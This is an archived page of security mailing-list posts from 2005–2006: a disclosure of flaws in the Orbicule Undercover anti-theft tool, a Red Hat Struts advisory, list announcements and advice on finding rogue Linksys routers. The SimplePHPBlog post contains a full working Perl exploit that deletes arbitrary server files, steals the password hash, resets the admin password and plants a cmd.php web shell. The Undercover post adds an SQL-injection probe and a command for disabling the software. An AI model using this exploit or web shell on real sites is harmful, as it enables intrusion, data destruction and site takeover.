Nabble - NetSys Full Disclosure

Issues with security software: orbicule.com "Undercover"

2006-02-02T01:12:45Z

During a lab exercise one of our students found several privacy
security issues in products and services offered by http://orbicule.com.

orbicule.com offers what is claimed to be a Notebook Anti-Theft
solution for Apple MacOS X called Undercover. You install their
software on their machine, register the machine with them and then
shit happens.

A) Website.

1. Everybody can see the list of Stolen Notebooks / their Mac
Addresses. See

http://www.orbicule.com/UCservices/trace.plist
http://www.orbicule.com/UCservices/hijack.plist

2. The site contains SQL injection vulnerabilities. Try
http://www.orbicule.com/UCServices/registration.php?mac=;nastystuff

B) Binary

The binary contains - for what ever reason = the ftp username and
passwort to administer the orbicule.com Website. This allows you to
download the list of registered users and do all kind of havoc. Eg.
backdooring the binary available for download on the site.

C) Theft Protection

1. The Binary is starts via LaunchDaemon and thus can be easily
disabled - a PoC:

$ sudo chmod -x /private/etc/uc.app/Contents/MacOS/uc
$ sudo reboot

2. The IP-Address check relies on the third party Website http://
checkip.dyndns.org/ thus revealing information to a thirtd party
unnecessary without stating this in the documentation.

Timeline:
2005-01-20: Issue Reported to us by Student, verified by us
2005-01-20: info@..., Peter.Schols@... contacted
2005-01-20: Reply by Peter Schols requesting further explanation,
email discussion of the issues
2005-01-20: Vendor assures us that "over the next weeks we will
increase our development efforts to get a more secure and more
reliable Undercover out as soon as possible."
2005-01-30: Vendor contacted us and assures the MAC Addresses are not
stored anymore on the server, the SQL-Injection is fixed and the
password is removed from the binary.
2005-02-01: Vendor now states our findings are wrong. Demands
"updating" of a blog entry at http://blogs.23.nu/c0re/stories/11058/
2005-02-01: Uncoordinated release after weighting damage done by non
release compared to release and considering that vednor hadn't
stopped distributing the broken software.

--
Maximillian Dornseif
Pi1 - Laboratory for Dependable Distributed Systems, University of
Mannheim, Germany
http://pi1.informatik.uni-mannheim.de/staff/home/dornseif

smime.p7s (3K) Download Attachment

[RHSA-2006:0157-01] Low: struts security update for Red Hat Application Server

2006-01-11T11:15:51Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ---------------------------------------------------------------------
Red Hat Security Advisory

Synopsis: Low: struts security update for Red Hat Application Server
Advisory ID: RHSA-2006:0157-01
Advisory URL: https://rhn.redhat.com/errata/RHSA-2006-0157.html
Issue date: 2006-01-11
Updated on: 2006-01-11
Product: Red Hat Application Server
CVE Names: CVE-2005-3745
- ---------------------------------------------------------------------

1. Summary:

Updated Red Hat Application Server components are now available including a
security update for Struts.

This update has been rated as having low security impact by the Red Hat
Security Response Team.

2. Relevant releases/architectures:

Red Hat Application Server 3AS - noarch
Red Hat Application Server 3ES - noarch
Red Hat Application Server 3WS - noarch

3. Problem description:

Red Hat Application Server packages provide a J2EE Application Server and
Web container as well as the underlying Java stack.

A cross-site scripting flaw was found in the way Struts displays error
pages. It may be possible for an attacker to construct a specially crafted
URL which could fool a victim into believing they are viewing a trusted
site. The Common Vulnerabilities and Exposures project assigned the
name CVE-2005-3745 to this issue. Please note that this issue does not
affect Struts running on Tomcat or JOnAS, which is our supported usage of
Struts.

All users of Red Hat Application Server should upgrade to these updated
packages, which contain Struts version 1.2.8 which is not vulnerable to
this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network. Many
people find this an easier way to apply updates. To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/):

173929 - CVE-2005-3745 struts cross site scripting flaw

6. RPMs required:

Red Hat Application Server 3AS:

SRPMS:
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
46933f732577bc526befdeea7bac8104 jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.src.rpm
155997f9d1c9e4bc5aa5925fc4c32c09 struts-1.2.8-1jpp_2rh.src.rpm

noarch:
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
f98c1b067974f6be016c01b0ab6295a0 jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
32401dec1ab787c56760145a033a4d7c jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.noarch.rpm
19ff36e45ff2aee9fab9e6aa06a8f46b struts-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
80b709089a6c65cc926df4d64695777e struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/struts-manual-1.2.8-1jpp_2rh.noarch.rpm
96e87e5eed99be4173961e8a805004c2 struts-manual-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3AS/en/RHAPS/SRPMS/struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm
9f50fcbd73cc59fdb65383bd9f3c28ef struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm

Red Hat Application Server 3ES:

SRPMS:
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
46933f732577bc526befdeea7bac8104 jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.src.rpm
155997f9d1c9e4bc5aa5925fc4c32c09 struts-1.2.8-1jpp_2rh.src.rpm

noarch:
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
f98c1b067974f6be016c01b0ab6295a0 jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
32401dec1ab787c56760145a033a4d7c jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.noarch.rpm
19ff36e45ff2aee9fab9e6aa06a8f46b struts-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
80b709089a6c65cc926df4d64695777e struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/struts-manual-1.2.8-1jpp_2rh.noarch.rpm
96e87e5eed99be4173961e8a805004c2 struts-manual-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3ES/en/RHAPS/SRPMS/struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm
9f50fcbd73cc59fdb65383bd9f3c28ef struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm

Red Hat Application Server 3WS:

SRPMS:
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
46933f732577bc526befdeea7bac8104 jakarta-commons-validator-1.1.4-1jpp_2rh.src.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.src.rpm
155997f9d1c9e4bc5aa5925fc4c32c09 struts-1.2.8-1jpp_2rh.src.rpm

noarch:
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
f98c1b067974f6be016c01b0ab6295a0 jakarta-commons-validator-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
32401dec1ab787c56760145a033a4d7c jakarta-commons-validator-javadoc-1.1.4-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/struts-1.2.8-1jpp_2rh.noarch.rpm
19ff36e45ff2aee9fab9e6aa06a8f46b struts-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
80b709089a6c65cc926df4d64695777e struts-javadoc-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/struts-manual-1.2.8-1jpp_2rh.noarch.rpm
96e87e5eed99be4173961e8a805004c2 struts-manual-1.2.8-1jpp_2rh.noarch.rpm
ftp://updates.redhat.com/enterprise/3WS/en/RHAPS/SRPMS/struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm
9f50fcbd73cc59fdb65383bd9f3c28ef struts-webapps-tomcat5-1.2.8-1jpp_2rh.noarch.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://www.redhat.com/security/team/key/#package

7. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3745

8. Contact:

The Red Hat security contact is <secalert@...>. More contact
details at https://www.redhat.com/security/team/contact/

Copyright 2006 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFDxVlLXlSAg2UNWIIRAqmrAKC+1tnj98alqz84hEmPDTEYD1uPgQCeJbW3
8jVbO8dYQyf1vZPBWVW/R9E=
=p/4j
-----END PGP SIGNATURE-----

[VulnWatch] New site location

2005-12-23T06:27:49Z

Hi,

First of all, Merry Christmas!
I've received some mails asking me when my site was going to be online
again, well....here it is:

http://www.iwhax.net/shadown/ (by the moment outdated)
http://www.whitehat.co.il/shadown/ (updated, with a miskate in the
explanation of sqlinject tool)

I have to very thanks muts for hosting my site. (Thanks!)

Cheers,
shadown

--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown@...

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have received
it by mistake please let us know by e-mail immediately and delete it from
your system; should also not copy the message nor disclose its contents to
anyone. Many thanks.

Announce: Bluetooth mailing list - Bluetraq

2005-09-30T04:38:44Z

Hi,

By popular demand, we (the trifinite group) have set up a public
(moderated) mailing list for discussion of all things Bluetooth. This is
not intended as a replacement for any existing disclosure lists, but
more for discussions about research into Bluetooth issues etc.

The list can be found here:

http://trifinite.org/trifinite_lists.html

enjoy,
Adam
--
Adam Laurie Tel: +44 (0) 20 7605 7000
The Bunker Secure Hosting Ltd. Fax: +44 (0) 20 7605 7099
Shepherds Building http://www.thebunker.net
Rockley Road
London W14 0DA mailto:adam@...
UNITED KINGDOM PGP key on keyservers

SimplePHPBlog Arbitrary File Deletion and Sample Exploit

2005-08-29T05:42:23Z

SimplePHPBlog has a vulnerability in its comment_delete_cgi.php.

The PHP script allows for the arbitrary deletion of files.

Please see following link for a perl script to demonstrate the exploit:
http://www.ftusecurity.com/pub/sphpblog_vulns
(Please add .pl extension as my ISP server preprocesses the file if it
is .pl or txt.)

This vulnerability, in combination with the fact that the installation
scripts are left on the server after installation, allows an arbitrary
user to reset the admin password to one of the attacker's choosing.

The script demonstrates the ability to delete files, reset the admin
password to the attacker's choosing and upload files (including a
command prompt).

The exploit is for educational purposes only.

To prevent this exploit change the line in comment_delete_cgi.php
from $logged_in = logged_in( false, true );
to $logged_in = logged_in( true, true );

Sincerely,
'ken'@FTU
Kenneth F. Belva, CISSP
http://www.ftusecurity.com

SimplePHPBlog Arbitrary File Deletion and Sample Exploit

2005-08-28T20:10:07Z

SimplePHPBlog has a vulnerability in its comment_delete_cgi.php.

The PHP script allows for the arbitrary deletion of files.

Attached is an perl script to demonstrate the exploit.

This vulnerability, in combination with the fact that the installation
scripts are left on the server after installation, allows an arbitrary
user to reset the admin password to one of the attacker's choosing.

The script demonstrates the ability to delete files, reset the admin
password to the attacker's choosing and upload files (including a
command prompt).

The exploit is for educational purposes only.

To prevent this exploit change the line in comment_delete_cgi.php
from $logged_in = logged_in( false, true );
to $logged_in = logged_in( true, true );

Sincerely,
'ken'@FTU
Kenneth F. Belva, CISSP
http://www.ftusecurity.com

#!/usr/bin/perl -w
#===============================================================================
# Title: sphpblog_vulns.pl
#
# Written by: Kenneth F. Belva, CISSP
# Franklin Technologies Unlimited, Inc.
# http://www.ftusecurity.com
#
# Date: August 25, 2005
#
# Version: 0.1
#
# Description: This program is for educational purposes only!
# SimplePHPBlog as a few vulnerability which this
# perl script demonstrates via an exploit.
#
# Instructions: Should be self-explanatory via the .pl help menu
#
# Solutions:
# *** Solution 1
# Change the line in comment_delete_cgi.php from
# $logged_in = logged_in( false, true ); to
# $logged_in = logged_in( true, true );
#
# *** Solution 2
# Place an .htaccess file with the following config in
# the ./config directory:
#
#
# #---------------------
# #Snip .htaccess start
# #---------------------
# IndexIgnore *
#
# <Files .htaccess>
# order allow,deny
# deny from all
# </Files>
#
# <Files *.txt>
# order allow,deny
# deny from all
# </Files>
# #---------------------
# #Snip .htaccess end
# #---------------------
#
#
# *** Solution 3
# See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
# for PHP modification to upload image script.
#===============================================================================

#-------------------------------------------------------------------------------
# Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
# Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
$unix="0"; #windows system
}else{
$unix="1"; #unix system
}

#-------------------------------------------------------------------------------
# The Main Menu
#-------------------------------------------------------------------------------

sub menu()
{
if ($unix){system("clear");}
else{system("cls");}

print "
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________

Program : $0
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.

Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!

Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com

Usage : $0 [-h host] [-e exploit]

-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File

Examples: $0 -h 127.0.0.1 -e 2
$0 -h 127.0.0.1 -e 3 -U l33t -P l33t
$0 -h 127.0.0.1 -e 4 -F ./index.php
$0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
$0 -h 127.0.0.1 -e 1
";

exit;
}

#-------------------------------------------------------------------------------
# Initial Routine
#-------------------------------------------------------------------------------

sub init()
{

use Switch;

# colon ':' after letter says that option takes variable
my $opt_string = 'e:U:P:h:F:?';
getopts( "$opt_string", \%args ) or menu();

#Load parameters
my $exploit = $args{e};
my $host = $args{h};
my $user = $args{U};
my $pass = $args{P};
my $file = $args{F};

# What shall we do today?
switch (%args) {
case "?" { menu();}
case "e" {
switch ($exploit) {

if ($unix){system("clear");}
else{system("cls");}

print "
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________";

# Upload cmd.php to /images
case "1" { print "\nRunning cmd.php Upload Exploit....\n\n";
&UploadCmdPHP($host);}
# Retrieve Username & Password hash
case "2" { print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
&RetrievePwd($host."/config/password.txt");}
# Replace Username and Password
case "3" { print "\nRunning Set New Username and Password Exploit....\n\n";
&SetUserPwd($host,$user,$pass);}
# Delete a System File
case "4" { print "\nRunning Delete System File Exploit....\n\n";
&DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

} #end $exploit switch
print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
} #end "e" case
else { menu();}
} #end %args switch

} #end sub init

#-------------------------------------------------------------------------------
# Exploit #1: Upload File Via POST
#-------------------------------------------------------------------------------

sub UploadCmdPHP {

my($url) = @_;

use LWP;
use HTTP::Request::Common qw(POST);
my $ua = LWP::UserAgent->new;

$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

#Step 1: Retrieve hash
#-----------------------------------------------------------------------
my $hash = &RetrievePwd($url."/config/password.txt");

#Step 2: Delete Existing Password file (SetUserPwd)
#Step 3: Create a temporary user id and password (SetUserPwd)
#-----------------------------------------------------------------------
&SetUserPwd($url,"a","a");

#Step 4: Log into the app and get the PHPSession / my_id session variable
#-----------------------------------------------------------------------
my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));

#Step 5: Create and upload our scripts (cmd.php & reset.php)
#-----------------------------------------------------------------------
&CreateTempPHPs();

# Upload cmd.php
my $path = "./cmd.php";
my $file = "cmd.php";
my $req = POST($url."/upload_img_cgi.php",
Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
Content_Type => 'form-data',
Content => [userfile => [$path,$file],],
);

my $response = $ua->request($req);
print "\nCreated cmd.php on target host: " . $url;
#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
#return $response->as_string;

# Upload reset.php
$path = "./reset.php";
$file = "reset.php";

$req = POST($url."/upload_img_cgi.php",
Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
Content_Type => 'form-data',
Content => [userfile => [$path,$file],],
);

$response = $ua->request($req);
print "\nCreated reset.php on target host: " . $url;
#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
#return $response->as_string;

#Remove local PHP files
&RemoveTempPHPs();

#Step 6: Reset origional Passwpord
#-----------------------------------------------------------------------
&ResetHash($url."/images/reset.php",$hash);

#Step 7: Pass command to delete reset.php (clean up)
#-----------------------------------------------------------------------
&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
print "\nRemoved reset.php from target host: " . $url;

print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
# Exploit #2: Retrieve Password File
#-------------------------------------------------------------------------------

sub RetrievePwd {

my($url) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = GET($url);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

my $hash = $response->content;
print "\nRetrieved Username and Password Hash: " . $hash;
return $hash

}

#-------------------------------------------------------------------------------
# Exploit #3: Set New Username and Password
#-------------------------------------------------------------------------------

sub SetUserPwd{

my($url,$user,$pass) = @_;

&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
&ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}

#-------------------------------------------------------------------------------
# POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {

my($url,$user,$pass) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ user => $user,
pass => $pass,
submit => '%C2%A0Submit%C2%A0'
]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\n./config/password.txt created!";
print "\nUsername is set to: ".$user;
print "\nPassword is set to: ".$pass;

}

#-------------------------------------------------------------------------------
# Exploit #4: Delete Password File
#-------------------------------------------------------------------------------

sub DeleteFile {

my($url,$file) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = GET($url.$file);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;
print "\nDeleted File: ".$file;

}

#-------------------------------------------------------------------------------
# log into site
#-------------------------------------------------------------------------------

sub Login {

my($url,$user,$pass) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ user => $user,
pass => $pass,
submit => '%C2%A0Submit%C2%A0'
]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\nLogged into SimplePHPBlog at: ".$url;
print "\nCurrent Username '".$user."' and Password '".$pass."'...";

return $response->header('Set-Cookie');

}

#-------------------------------------------------------------------------------
# POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

my($url,$hash) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ hash => $hash]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\nReset Hash at: ".$url;
print "\nReset Hash value: ".$hash;

}

#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

my($hash) = @_;

open(PHPFILE, ">./cmd.php");
print PHPFILE &CreateCmdPHP();
close PHPFILE;
print "\nCreated cmd.php on your local machine.";

open(PHPFILE, ">./reset.php");
print PHPFILE &CreateResetPHP();
close PHPFILE;
print "\nCreated reset.php on your local machine.";
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

unlink("./cmd.php");
print "\nRemoved cmd.php from your local machine.";
unlink("./reset.php");
print "\nRemoved reset.php from your local machine.";

}

#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {

my($savedata) = @_;

my $PHPstring = "PHPSESSID";
my $semi = "\;";

my $datalength = length($savedata);
my $PHPstart= (index $savedata, $PHPstring)+10;
my $PHPend = index $savedata,$semi,$PHPstart;
my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
return $PHPsession;

}

sub CreateCmdPHP(){

return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end

}

sub CreateResetPHP(){

return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}

#------------------------------------------------------
# Begin Routines
#------------------------------------------------------
init();

Re: Tool for Identifying Rogue Linksys Routers

2005-08-26T18:13:24Z

On Thursday, 2005-08-25 at 11:48 MST, Martin Mkrtchian
<dotsecure@...> wrote:
> We are migrating from Lucent QIP to MetaIP for DHCP services and so
> far we have had two issues when MetaIP has been implemented for VLAN
> that has an unauthorized Linksys router giving out IP addresses.
>
> Is there a scanning tool out there that can determine if there are
> unauthorized Linksys (type) routers in a specific VLAN?

First you say you have a problem with rogue dhcp servers (don't we all?),
then you way you're looking for routers.

For the rogue dhcp server problem, there are 2 types of this problem, but
unfortunately the solutions I've found aren't quite as specific to dhcp as
I would like.

Blocking at layer 3 (router) is relatively easy - you can block traffic to
68/udp except from your official dhcp servers.

Blocking at layer 2 is harder. Here is a suggestion for doing it on Cisco
switches (which might not work on low end equipment - haven't tried that -
the switches must support vlan filtering):

Using vlan filtering, define that rogue traffic is dropped and logged; all
other traffic is forwarded:

vlan access-map dhcpmap 10
match ip address rogue_dhcp
action drop log
vlan access-map dhcpmap 20
match ip address any_host
action forward
exit

An access list that matches all traffic:

ip access-list standard any_host
remark Provide a match (permit) for all traffic
permit any
exit

An access list that matches rogue dhcp traffic. (With Cisco's strange
vlan access mechanism, it requires that we appear to be blocking the valid
traffic and allowing the bad stuff. But, in conjunction with the
access-map, just the opposite occurs.)

ip access-list extended rogue_dhcp
remark Provide a match (permit) for dhcp responses from rogue servers
deny udp host 10.1.32.21 any eq bootpc ! these are my official dhcp
servers
deny udp host 10.1.32.22 any eq bootpc ! likewise
deny udp 10.1.0.0 0.0.252.7 any eq bootpc ! my routers, that might be
relaying legitimate dhcp
permit udp any any eq bootpc ! the match that will catch
the rogues
deny ip any any ! don't catch anything
else
exit

Apply this setup to the vlans supported by my dhcp servers:

vlan filter dhcpmap vlan-list 64-128,136-140,146,232

The way this works it could result in blocking some traffic that you
really don't want to (for example, if any of your users employ PIXIE to
load some of their machines). If so, you will need to add the addresses
of those server machines to the filter as though they were official dhcp
servers - so that their bootpc traffic is not blocked.

Tony Rall

Re: Tool for Identifying Rogue Linksys Routers

2005-08-26T13:29:11Z

If the Linksys devices are DHCP clients themselves, you might be able
to use DHCPFingerprint to locate them when they renew their leases.

You may want to contact the folks at http://www.packetfence.org. They
may have a more comprehensive list of signatures.

Also, nmap may work, see
http://seclists.org/lists/nmap-dev/2003/Apr-Jun/0010.html for more
details.

Examining TTLs of packets coming from edge devices may also give you
some indication of who's sitting behind an extra hop, though some
folks may be savvy enough to tweak this on their workstations to avoid
detection.

Good luck.

On 8/25/05, Martin Mkrtchian <dotsecure@...> wrote:

> Dear Group Members
>
> We are migrating from Lucent QIP to MetaIP for DHCP services and so
> far we have had two issues when MetaIP has been implemented for VLAN
> that has an unauthorized Linksys router giving out IP addresses.
>
> Is there a scanning tool out there that can determine if there are
> unauthorized Linksys (type) routers in a specific VLAN?
>
> Your input is appreciated
>
> Thank You
>
> Martin M
> http://dotsecure.blogspot.com
>

--
Dave Hull
ireadit@...

Re: Tool for Identifying Rogue Linksys Routers

2005-08-26T07:31:45Z

> Is there a scanning tool out there that can determine if there are
> unauthorized Linksys (type) routers in a specific VLAN?

All linksys MACs will have an address with one of these prefixes:
00045A The Linksys Group,
000625 The Linksys Group, In
000C41 The Linksys Group, In
000F66 Cisco-Linksys
001217 Cisco-Linksys, LLC
001310 Cisco-Linksys, LLC
e.g.
00:04:5A:xx:xx:xx

Plug a laptop into any worrisome network segments and look for a linksys
MAC address. If the linksys routers talk IPv6:
ping6 -w ff02:1%fxp0 (or %eth0 or whatever your interface is)
Otherwise do a broadcast ping, a ping sweep, or whatever will tickle a
linksys router.

(friendly reminder: the host's MAC address will not be preserved if the
packet goes through a router)

.mike
frantzen@(nfr.com | cvs.openbsd.org | w4g.org)
PGP: CC A4 E2 E8 0C F8 42 F0 BC 26 85 5B 6F 9E ED 28

RE: Tool for Identifying Rogue Linksys Routers

2005-08-25T15:52:15Z

The right way to fix that is to implement switch-level recurity. Limit the
number of mac and IP address on each ports. No workstation should ever have
more that one MAC and IP address...

If you don't have the budget for that kind of switch, I'd first try to
identify open ports and try to recognize services on a linksys router. Nmap
and telnet will be your best friends.

Thomas Guyot-Sionnest,
Administrateur de systèmes
Tél: (514) 842-7054
Fax: (514) 221-3395
Courriel: thomas@...

> -----Original Message-----
> From: Martin Mkrtchian [mailto:dotsecure@...]
> Sent: Thursday, August 25, 2005 14:49
> To: Bugtraq; Full-Disclosure (E-mail)
> Subject: Tool for Identifying Rogue Linksys Routers
>
> Dear Group Members
>
> We are migrating from Lucent QIP to MetaIP for DHCP services
> and so far we have had two issues when MetaIP has been
> implemented for VLAN that has an unauthorized Linksys router
> giving out IP addresses.
>
> Is there a scanning tool out there that can determine if
> there are unauthorized Linksys (type) routers in a specific VLAN?
>
> Your input is appreciated
>
> Thank You
>
> Martin M
> http://dotsecure.blogspot.com
>

smime.p7s (4K) Download Attachment

Re: Tool for Identifying Rogue Linksys Routers

2005-08-25T15:14:54Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Martin,

Martin Mkrtchian wrote:
> Is there a scanning tool out there that can determine if there are
> unauthorized Linksys (type) routers in a specific VLAN?

You can use the Nessus plugin 11026 (find_ap.nasl) to scan your network
for open HTTP, SNMP and FTP servers. Using Nmap fingerprinting and
banner grabbing, this plugin does a decent job at finding rogue AP's
that don't mind being found (e.g. they haven't been specifically
configured to hide from administrators).

Alternatively, wireless-side analysis is the way to go to locate rogue
AP's! Kismet (www.kismetwireless.net), or a commercial tool will be
helpful there.

- -Josh
- --
- -Joshua Wright
jwright@...

2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm
fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF

Today I stumbled across the world's largest hotspot. The SSID is "linksys".
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDDjTNTS8i9jZYpL8RAqbCAKCD7fGJk/tCRrPg8BfQ2p+tbC0zRgCg4ZLX
u8D2UrPqEa2Q17fDiu8x0oM=
=0/CO
-----END PGP SIGNATURE-----

Tool for Identifying Rogue Linksys Routers

2005-08-25T12:48:38Z

Dear Group Members

We are migrating from Lucent QIP to MetaIP for DHCP services and so
far we have had two issues when MetaIP has been implemented for VLAN
that has an unauthorized Linksys router giving out IP addresses.

Is there a scanning tool out there that can determine if there are
unauthorized Linksys (type) routers in a specific VLAN?

Your input is appreciated

Thank You

Martin M
http://dotsecure.blogspot.com

